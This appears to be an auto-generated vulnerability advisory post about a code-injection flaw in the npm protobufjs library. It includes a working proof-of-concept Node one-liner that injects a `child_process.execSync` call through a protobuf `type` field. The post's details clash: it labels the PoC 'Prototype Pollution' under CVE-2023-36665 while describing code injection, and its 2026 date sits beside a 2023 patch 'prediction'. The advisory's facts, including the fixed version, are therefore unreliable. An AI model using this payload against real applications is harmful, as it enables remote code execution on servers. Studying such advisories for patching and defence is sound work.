Listen to this Post
The vulnerability arises from improper input validation when processing attacker-controlled protobuf definitions. Specifically, when the application compiles protobuf definitions into JavaScript functions, an attacker can inject arbitrary code into the `type` fields of those definitions. This malicious payload is then executed during object decoding when the application uses the compromised definition. The injection occurs because the library fails to sanitize the content of `type` fields, treating them as safe JavaScript strings when they are actually malicious code. The issue can be triggered through multiple vectors: parsing protobuf messages on the fly using the `parse` function, loading `.proto` files via `load` or loadSync, or providing untrusted input to internal functions like `ReflectionObject.setParsedOption` and util.setProperty. As shown in the Proof of Concept, a specially crafted descriptor JSON containing a `Data(){…}` pattern within a `type` field leads to the execution of arbitrary system commands when the message is decoded. This vulnerability effectively allows a remote attacker to achieve arbitrary code execution on the target system, with the only prerequisite being the ability to control the protobuf definition files used by the application.
dailycve form:
Platform: Node.js / npm
Version: 6.10.0 – 7.2.4
Vulnerability: Code Injection
Severity: Critical
date: 2026-04-16
Prediction: Patch available 2023-06-27
What Undercode Say:
!/bin/bash Prototype Pollution PoC for protobufjs (CVE-2023-36665) Run in Node.js environment npm install [email protected] node -e " const protobuf = require('protobufjs'); const maliciousDescriptor = JSON.parse(`{ \"nested\": { \"User\": { \"fields\": { \"id\": { \"type\": \"int32\", \"id\": 1 }, \"data\": { \"type\": \"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\nfunction X\", \"id\": 2 } } }, \"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\nfunction X\": { \"fields\": { \"content\": { \"type\": \"string\", \"id\": 1 } } } } }`); const root = protobuf.Root.fromJSON(maliciousDescriptor); const UserType = root.lookupType('User'); const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]); UserType.decode(userBytes); "
Exploit:
An attacker crafts a malicious protobuf definition JSON where the `type` field of a message contains a JavaScript function that executes arbitrary code. When the application loads this definition and decodes a message, the injected code runs with the privileges of the Node.js process.
Protection from this CVE:
- Upgrade protobufjs to version 7.2.5 or later.
- Validate and sanitize all protobuf definition sources before loading.
- Avoid using `load()` or `parse()` with untrusted input.
- Implement strict access controls on definition files.
Impact:
Remote Code Execution (RCE) with the ability to execute arbitrary system commands. Attackers can fully compromise the application server, steal sensitive data, install backdoors, or pivot to internal networks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

